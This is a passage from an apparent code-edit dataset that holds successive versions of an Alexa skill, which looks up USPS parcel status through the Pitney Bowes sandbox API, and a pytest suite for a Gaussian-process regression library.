')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\ndef setFirstEleven(intent, session):\n session_attributes = {}\n should_end_session = False\n speech_output = 'Now give remaining digits'\n reprompt_text = 'Now give the next eleven numbers'\n try:\n tracking_number_1 = intent['slots']['One']['value']\n tracking_number_2 = intent['slots']['Two']['value']\n tracking_number_3 = intent['slots']['Three']['value']\n tracking_number_4 = intent['slots']['Four']['value']\n tracking_number_5 = intent['slots']['Five']['value']\n tracking_number_6 = intent['slots']['Six']['value']\n tracking_number_7 = intent['slots']['Seven']['value']\n tracking_number_8 = intent['slots']['Eight']['value']\n tracking_number_9 = intent['slots']['Nine']['value']\n tracking_number_10 = intent['slots']['Ten']['value']\n first_ten = '%s%s%s%s%s%s%s%s%s%s' % (tracking_number_1,\n tracking_number_2, tracking_number_3, tracking_number_4,\n tracking_number_5, tracking_number_6, tracking_number_7,\n tracking_number_8, tracking_number_9, tracking_number_10)\n session_attributes['first_ten'] = first_ten\n print('session after adding first ten--->')\n print(session_attributes)\n except Exception as app_exception:\n traceback.print_tb\n speech_output = (\n 'There was some problem, Please provide first ten digits of the tracking number'\n )\n reprompt_text = 'Please say first ten digits of the tracking number'\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef getParcelStatus(intent, session):\n session_attributes = {}\n should_end_session = True\n speech_output = 'There was some problem in taking your input'\n reprompt_text = 'Please say remaining digits of the tracking number'\n try:\n tracking_number_11 = intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n 
tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,\n tracking_number_12, tracking_number_13, tracking_number_14,\n tracking_number_15, tracking_number_16, tracking_number_17,\n tracking_number_18, tracking_number_19, tracking_number_20,\n tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = '%s%s' % (session['attributes']['first_ten'],\n tracking_number)\n bearer = 'Bearer %s' % session['access_token']\n print('USPS FULL Tracking Number ----> %s' % full_tracking_number)\n url = (\n 'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'\n % full_tracking_number)\n r = requests.get(url, headers={'Authorization': bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if r.status_code == 200:\n speech_output = 'The status of the parcel is ' + tracking_response[\n 'status']\n reprompt_text = 'The status of the parcel is ' + tracking_response[\n 'status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or 'attributes' in 
session and \n 'first_ten' not in session['attributes']):\n speech_output = (\n 'Please provide only first ten digits of the tracking number')\n reprompt_text = (\n 'Please provide only first ten digits of the tracking number')\n else:\n speech_output = (\n 'There was some problem, Please say remaining digits of the tracking number'\n )\n reprompt_text = (\n 'Please say remaining digits of the tracking number')\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, 
session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
"step-5": "\"\"\"\nCode for Alexa skill to check PB tracking\n\"\"\"\n\nfrom __future__ import print_function\nimport traceback\nimport requests\nimport os\nimport json\n\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'card': {\n 'type': 'Simple',\n 'title': \"SessionSpeechlet - \" + title,\n 'content': \"SessionSpeechlet - \" + output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n\n# --------------- Functions that control the skill's behavior ------------------\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome to PB Parcel Tracker\"\n speech_output = \"Please give first 10 digits of tracking number\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please give first 10 digits of tracking number\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for trying the Alexa Skills Kit sample. \" \\\n \"Have a nice day! 
\"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n#----- get tracking ------\n\ndef setFirstEleven(intent, session):\n session_attributes = {}\n should_end_session = False\n speech_output = \"Now give remaining digits\"\n reprompt_text = \"Now give the next eleven numbers\"\n try:\n tracking_number_1 = intent['slots']['One']['value']\n tracking_number_2 = intent['slots']['Two']['value']\n tracking_number_3 = intent['slots']['Three']['value']\n tracking_number_4 = intent['slots']['Four']['value']\n tracking_number_5 = intent['slots']['Five']['value']\n tracking_number_6 = intent['slots']['Six']['value']\n tracking_number_7 = intent['slots']['Seven']['value']\n tracking_number_8 = intent['slots']['Eight']['value']\n tracking_number_9 = intent['slots']['Nine']['value']\n tracking_number_10 = intent['slots']['Ten']['value']\n first_ten = \"%s%s%s%s%s%s%s%s%s%s\" % (tracking_number_1, tracking_number_2,tracking_number_3, tracking_number_4,tracking_number_5, tracking_number_6,tracking_number_7, tracking_number_8,tracking_number_9, tracking_number_10)\n session_attributes['first_ten'] = first_ten\n print(\"session after adding first ten--->\")\n print(session_attributes)\n except Exception as app_exception:\n traceback.print_tb\n speech_output = \"There was some problem, Please provide first ten digits of the tracking number\"\n reprompt_text = \"Please say first ten digits of the tracking number\"\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n#----- get tracking ------\n\ndef getParcelStatus(intent, session):\n session_attributes = {}\n should_end_session = True\n speech_output = \"There was some problem in taking your input\"\n reprompt_text = \"Please say remaining digits of the tracking number\"\n try:\n 
tracking_number_11= intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = \"%s%s%s%s%s%s%s%s%s%s%s%s\" % (tracking_number_11,tracking_number_12, tracking_number_13, tracking_number_14,tracking_number_15, tracking_number_16,tracking_number_17, tracking_number_18,tracking_number_19, tracking_number_20,tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = \"%s%s\" % (session['attributes']['first_ten'], tracking_number)\n bearer = \"Bearer %s\" % (session['access_token'])\n print(\"USPS FULL Tracking Number ----> %s\" % (full_tracking_number))\n url = \"https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS\" %(full_tracking_number)\n r=requests.get(url, headers={\"Authorization\" : bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if(r.status_code == 200):\n speech_output = \"The status of the parcel is \"+tracking_response['status']\n reprompt_text = \"The status of the parcel is \"+tracking_response['status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n 
traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or ('attributes' in session and 'first_ten' not in session['attributes'])):\n speech_output = \"Please provide only first ten digits of the tracking number\"\n reprompt_text = \"Please provide only first ten digits of the tracking number\"\n else:\n speech_output = \"There was some problem, Please say remaining digits of the tracking number\"\n reprompt_text = \"Please say remaining digits of the tracking number\"\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = \"Basic \"+access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={\"Authorization\": access_key_value,\n \"Content-Type\": \"application/x-www-form-urlencoded\"},\n data={\"grant_type\": \"client_credentials\"})\n print(r.status_code)\n if(r.status_code == 200):\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name 
= intent_request['intent']['name']\n if('access_token' not in session):\n oauth_request(session)\n print(session['access_token'])\n # Dispatch to your skill's intent handlers\n if intent_name == \"Tracking\":\n return setFirstEleven(intent, session)\n elif intent_name == \"TrackingSecond\":\n return getParcelStatus(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) 
The JSON body of the request is provided in the event parameter.\n \"\"\"\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n",
"step-ids": [
9,
10,
12,
13,
14
]
}
|
[
9,
10,
12,
13,
14
] |
import pytest
import os
import pandas as pd
import numpy as np
import math
import scipy
from scipy import stats
from sklearn import metrics, linear_model
from gpmodel import gpkernel
from gpmodel import gpmodel
from gpmodel import gpmean
from gpmodel import chimera_tools
# Shared random fixtures for all tests below.
# NOTE: the RNG calls run in a fixed order at import time; do not reorder.
n = 200   # number of training points
d = 10    # input dimensionality
X = np.random.random(size=(n, d))
xa = X[[0]]
xb = X[[1]]
Xc = X[[2]]
# Binary labels in {+1, -1} (used by classification-oriented tests elsewhere).
class_Y = np.random.choice((1, -1), size=(n,))
alpha = 1e-1
# Lasso-based mean function fixture.
func = gpmean.GPMean(linear_model.Lasso, alpha=alpha)
X_test = np.random.random(size=(5, d))
kernel = gpkernel.SEKernel()
# Draw targets from a GP prior with the SE kernel, then add observation noise.
cov = kernel.cov(X, X, hypers=(1.0, 0.5))
variances = np.random.random(size=(n, ))
Y = np.random.multivariate_normal(np.zeros(n), cov=cov)
Y += np.random.normal(0, 0.2, n)
def test_init():
    """Constructor defaults: zero mean function, ML objective, stored kernel."""
    default_model = gpmodel.GPRegressor(kernel)
    assert np.allclose(default_model.mean_func.mean(X), np.zeros(len(X)))
    assert default_model.objective == default_model._log_ML
    assert default_model.kernel == kernel
    assert default_model.guesses is None
    # Supplied hyperparameter guesses are stored verbatim.
    guesses = (0.1, 0.1, 0.1)
    seeded_model = gpmodel.GPRegressor(kernel, guesses=guesses)
    assert seeded_model.guesses == guesses
def test_normalize():
    """_normalize returns (mean, std, z-scores) and unnormalize inverts it."""
    model = gpmodel.GPRegressor(kernel)
    mean, std, z_scores = model._normalize(Y)
    assert np.isclose(mean, Y.mean())
    assert np.isclose(std, Y.std())
    assert np.allclose(z_scores, (Y - mean) / std)
    # unnormalize reads the stats from the model's attributes.
    model.std = std
    model.mean = mean
    assert np.allclose(model.unnormalize(z_scores), Y)
def test_K():
    """_make_Ks adds unit noise or the stored per-point variances to K."""
    model = gpmodel.GPRegressor(kernel)
    model.kernel.fit(X)
    # Homoscedastic case: the extra hyperparameter is the noise variance (1).
    K, Ky = model._make_Ks((1, 1, 1))
    assert np.allclose(kernel.cov(X, X), K)
    assert np.allclose(K + np.eye(len(K)), Ky)
    # Heteroscedastic case: per-point variances go on the diagonal.
    model.variances = variances
    K, Ky = model._make_Ks((1, 1))
    assert np.allclose(kernel.cov(X, X), K)
    assert np.allclose(K + np.diag(variances), Ky)
def test_ML():
    """_log_ML matches the textbook negative log marginal likelihood."""
    model = gpmodel.GPRegressor(kernel)
    model.kernel.fit(X)
    model.normed_Y = model._normalize(Y)[2]
    model._ell = len(Y)
    hypers = np.random.random(size=(3,))
    y_col = model.normed_Y.reshape((n, 1))
    _, Ky = model._make_Ks(hypers)
    # -log p(y) = 1/2 y' Ky^-1 y + 1/2 log|Ky| + (ell/2) log(2*pi)
    data_fit = 0.5 * y_col.T @ np.linalg.inv(Ky) @ y_col
    complexity = 0.5 * np.log(np.linalg.det(Ky))
    normalizer = model._ell / 2.0 * np.log(2 * np.pi)
    expected = data_fit + complexity + normalizer
    assert np.isclose(expected, model._log_ML(hypers))
def test_fit():
    """fit stores training data, normalization stats, and cached matrices."""
    model = gpmodel.GPRegressor(kernel)
    model.fit(X, Y)
    # One extra hyperparameter (noise variance) beyond the kernel's own.
    assert model._n_hypers == kernel._n_hypers + 1
    assert np.allclose(X, model.X)
    assert np.allclose(Y, model.Y)
    mean, std, normed = model._normalize(Y)
    assert np.isclose(model.mean, mean)
    assert np.isclose(model.std, std)
    assert np.allclose(model.normed_Y, normed)
    # Rebuild the cached matrices from the fitted hyperparameters.
    noise_var, s0, ell = model.hypers
    K = kernel.cov(X, X, (s0, ell))
    Ky = K + noise_var * np.eye(len(K))
    assert np.allclose(model._K, K)
    assert np.allclose(model._Ky, Ky)
    assert np.allclose(model._L, np.linalg.cholesky(Ky))
    assert np.allclose(model._alpha, np.linalg.inv(Ky) @ normed.reshape((n, 1)))
    assert np.isclose(model.ML, model._log_ML(model.hypers))
def test_predict():
    """predict reproduces the closed-form GP posterior mean and variance.

    Fix: removed leftover debug ``print`` calls that cluttered test output,
    and replaced the redundant ``[1::]`` slice with ``[1:]``.
    """
    model = gpmodel.GPRegressor(kernel)
    model.fit(X, Y)
    h = model.hypers[1:]  # kernel hypers; hypers[0] is the noise variance
    m, s, normed = model._normalize(Y)
    k_star = model.kernel.cov(X_test, X, hypers=h)
    k_star_star = model.kernel.cov(X_test, X_test, hypers=h)
    K = kernel.cov(X, X, h)
    Ky = K + np.diag(model.hypers[0] * np.ones(len(K)))
    Ky_inv = np.linalg.inv(Ky)
    # Posterior mean, mapped back to the unnormalized scale.
    means = k_star @ Ky_inv @ normed.reshape(len(Y), 1)
    means = means * s + m
    # Posterior covariance, rescaled by the normalization variance.
    var = k_star_star - k_star @ Ky_inv @ k_star.T
    var *= s ** 2
    pred_mean, pred_var = model.predict(X_test)
    # Loose absolute tolerance: predict may use Cholesky solves rather than
    # an explicit inverse, so the variances agree only approximately.
    assert (np.abs(pred_var - var) < 1e-1).all()
    assert np.allclose(means[:, 0], pred_mean, rtol=1.e-8, atol=1e-4)
def test_pickles():
    """A dumped and reloaded model makes identical predictions."""
    original = gpmodel.GPRegressor(kernel)
    original.fit(X, Y)
    mean_before, var_before = original.predict(X_test)
    original.dump('test.pkl')
    restored = gpmodel.GPRegressor.load('test.pkl')
    os.remove('test.pkl')
    mean_after, var_after = restored.predict(X_test)
    assert np.allclose(mean_before, mean_after)
    assert np.allclose(var_before, var_after)
if __name__ == "__main__":
    # Run every test in definition order when executed as a plain script.
    for run_test in (test_init, test_normalize, test_K, test_ML,
                     test_fit, test_predict, test_pickles):
        run_test()
# To Do:
# Test LOO_res and LOO_log_p and fitting with LOO_log_p
# Test with mean functions
# Test with given variances
|
normal
|
{
"blob_id": "62c28b5eb31b90191dfbab4456fc5373ba51bf64",
"index": 8869,
"step-1": "<mask token>\n\n\ndef test_normalize():\n model = gpmodel.GPRegressor(kernel)\n m, s, normed = model._normalize(Y)\n assert np.isclose(m, Y.mean())\n assert np.isclose(s, Y.std())\n assert np.allclose(normed, (Y - m) / s)\n model.std = s\n model.mean = m\n assert np.allclose(Y, model.unnormalize(normed))\n\n\ndef test_K():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n K, Ky = model._make_Ks((1, 1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(np.ones(len(K))))\n model.variances = variances\n K, Ky = model._make_Ks((1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(variances))\n\n\ndef test_ML():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n model.normed_Y = model._normalize(Y)[2]\n model._ell = len(Y)\n hypers = np.random.random(size=(3,))\n y_mat = model.normed_Y.reshape((n, 1))\n K, Ky = model._make_Ks(hypers)\n first = 0.5 * y_mat.T @ np.linalg.inv(Ky) @ y_mat\n second = 0.5 * np.log(np.linalg.det(Ky))\n third = model._ell / 2.0 * np.log(2 * np.pi)\n actual = first + second + third\n assert np.isclose(actual, model._log_ML(hypers))\n\n\ndef test_fit():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n assert model._n_hypers == kernel._n_hypers + 1\n assert np.allclose(model.X, X)\n assert np.allclose(model.Y, Y)\n m, s, normed = model._normalize(Y)\n assert np.allclose(model.normed_Y, normed)\n assert np.isclose(m, model.mean)\n assert np.isclose(s, model.std)\n vn, s0, ell = model.hypers\n K = kernel.cov(X, X, (s0, ell))\n Ky = K + np.diag(vn * np.ones(len(K)))\n ML = model._log_ML(model.hypers)\n L = np.linalg.cholesky(Ky)\n alpha = np.linalg.inv(Ky) @ normed.reshape((n, 1))\n assert np.isclose(model.ML, ML)\n assert np.allclose(model._K, K)\n assert np.allclose(model._Ky, Ky)\n assert np.allclose(model._L, L)\n assert np.allclose(model._alpha, alpha)\n\n\ndef test_predict():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n h = 
model.hypers[1:]\n m, s, normed = model._normalize(Y)\n k_star = model.kernel.cov(X_test, X, hypers=h)\n k_star_star = model.kernel.cov(X_test, X_test, hypers=h)\n K = kernel.cov(X, X, h)\n Ky = K + np.diag(model.hypers[0] * np.ones(len(K)))\n means = k_star @ np.linalg.inv(Ky) @ normed.reshape(len(Y), 1)\n means = means * s + m\n var = k_star_star - k_star @ np.linalg.inv(Ky) @ k_star.T\n var *= s ** 2\n m, v = model.predict(X_test)\n print(v)\n print(var)\n print(model.hypers[0])\n assert (np.abs(v - var) < 0.1).all()\n assert np.allclose(means[:, 0], m, rtol=1e-08, atol=0.0001)\n\n\ndef test_pickles():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n m1, v1 = model.predict(X_test)\n model.dump('test.pkl')\n new_model = gpmodel.GPRegressor.load('test.pkl')\n os.remove('test.pkl')\n m2, v2 = new_model.predict(X_test)\n assert np.allclose(m1, m2)\n assert np.allclose(v1, v2)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_init():\n model = gpmodel.GPRegressor(kernel)\n assert np.allclose(model.mean_func.mean(X), np.zeros((len(X),)))\n assert model.objective == model._log_ML\n assert model.kernel == kernel\n assert model.guesses is None\n model = gpmodel.GPRegressor(kernel, guesses=(0.1, 0.1, 0.1))\n assert model.guesses == (0.1, 0.1, 0.1)\n\n\ndef test_normalize():\n model = gpmodel.GPRegressor(kernel)\n m, s, normed = model._normalize(Y)\n assert np.isclose(m, Y.mean())\n assert np.isclose(s, Y.std())\n assert np.allclose(normed, (Y - m) / s)\n model.std = s\n model.mean = m\n assert np.allclose(Y, model.unnormalize(normed))\n\n\ndef test_K():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n K, Ky = model._make_Ks((1, 1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(np.ones(len(K))))\n model.variances = variances\n K, Ky = model._make_Ks((1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(variances))\n\n\ndef test_ML():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n model.normed_Y = model._normalize(Y)[2]\n model._ell = len(Y)\n hypers = np.random.random(size=(3,))\n y_mat = model.normed_Y.reshape((n, 1))\n K, Ky = model._make_Ks(hypers)\n first = 0.5 * y_mat.T @ np.linalg.inv(Ky) @ y_mat\n second = 0.5 * np.log(np.linalg.det(Ky))\n third = model._ell / 2.0 * np.log(2 * np.pi)\n actual = first + second + third\n assert np.isclose(actual, model._log_ML(hypers))\n\n\ndef test_fit():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n assert model._n_hypers == kernel._n_hypers + 1\n assert np.allclose(model.X, X)\n assert np.allclose(model.Y, Y)\n m, s, normed = model._normalize(Y)\n assert np.allclose(model.normed_Y, normed)\n assert np.isclose(m, model.mean)\n assert np.isclose(s, model.std)\n vn, s0, ell = model.hypers\n K = kernel.cov(X, X, (s0, ell))\n Ky = K + np.diag(vn * np.ones(len(K)))\n ML = model._log_ML(model.hypers)\n L = 
np.linalg.cholesky(Ky)\n alpha = np.linalg.inv(Ky) @ normed.reshape((n, 1))\n assert np.isclose(model.ML, ML)\n assert np.allclose(model._K, K)\n assert np.allclose(model._Ky, Ky)\n assert np.allclose(model._L, L)\n assert np.allclose(model._alpha, alpha)\n\n\ndef test_predict():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n h = model.hypers[1:]\n m, s, normed = model._normalize(Y)\n k_star = model.kernel.cov(X_test, X, hypers=h)\n k_star_star = model.kernel.cov(X_test, X_test, hypers=h)\n K = kernel.cov(X, X, h)\n Ky = K + np.diag(model.hypers[0] * np.ones(len(K)))\n means = k_star @ np.linalg.inv(Ky) @ normed.reshape(len(Y), 1)\n means = means * s + m\n var = k_star_star - k_star @ np.linalg.inv(Ky) @ k_star.T\n var *= s ** 2\n m, v = model.predict(X_test)\n print(v)\n print(var)\n print(model.hypers[0])\n assert (np.abs(v - var) < 0.1).all()\n assert np.allclose(means[:, 0], m, rtol=1e-08, atol=0.0001)\n\n\ndef test_pickles():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n m1, v1 = model.predict(X_test)\n model.dump('test.pkl')\n new_model = gpmodel.GPRegressor.load('test.pkl')\n os.remove('test.pkl')\n m2, v2 = new_model.predict(X_test)\n assert np.allclose(m1, m2)\n assert np.allclose(v1, v2)\n\n\n<mask token>\n",
"step-3": "<mask token>\nY += np.random.normal(0, 0.2, n)\n\n\ndef test_init():\n model = gpmodel.GPRegressor(kernel)\n assert np.allclose(model.mean_func.mean(X), np.zeros((len(X),)))\n assert model.objective == model._log_ML\n assert model.kernel == kernel\n assert model.guesses is None\n model = gpmodel.GPRegressor(kernel, guesses=(0.1, 0.1, 0.1))\n assert model.guesses == (0.1, 0.1, 0.1)\n\n\ndef test_normalize():\n model = gpmodel.GPRegressor(kernel)\n m, s, normed = model._normalize(Y)\n assert np.isclose(m, Y.mean())\n assert np.isclose(s, Y.std())\n assert np.allclose(normed, (Y - m) / s)\n model.std = s\n model.mean = m\n assert np.allclose(Y, model.unnormalize(normed))\n\n\ndef test_K():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n K, Ky = model._make_Ks((1, 1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(np.ones(len(K))))\n model.variances = variances\n K, Ky = model._make_Ks((1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(variances))\n\n\ndef test_ML():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n model.normed_Y = model._normalize(Y)[2]\n model._ell = len(Y)\n hypers = np.random.random(size=(3,))\n y_mat = model.normed_Y.reshape((n, 1))\n K, Ky = model._make_Ks(hypers)\n first = 0.5 * y_mat.T @ np.linalg.inv(Ky) @ y_mat\n second = 0.5 * np.log(np.linalg.det(Ky))\n third = model._ell / 2.0 * np.log(2 * np.pi)\n actual = first + second + third\n assert np.isclose(actual, model._log_ML(hypers))\n\n\ndef test_fit():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n assert model._n_hypers == kernel._n_hypers + 1\n assert np.allclose(model.X, X)\n assert np.allclose(model.Y, Y)\n m, s, normed = model._normalize(Y)\n assert np.allclose(model.normed_Y, normed)\n assert np.isclose(m, model.mean)\n assert np.isclose(s, model.std)\n vn, s0, ell = model.hypers\n K = kernel.cov(X, X, (s0, ell))\n Ky = K + np.diag(vn * np.ones(len(K)))\n ML = 
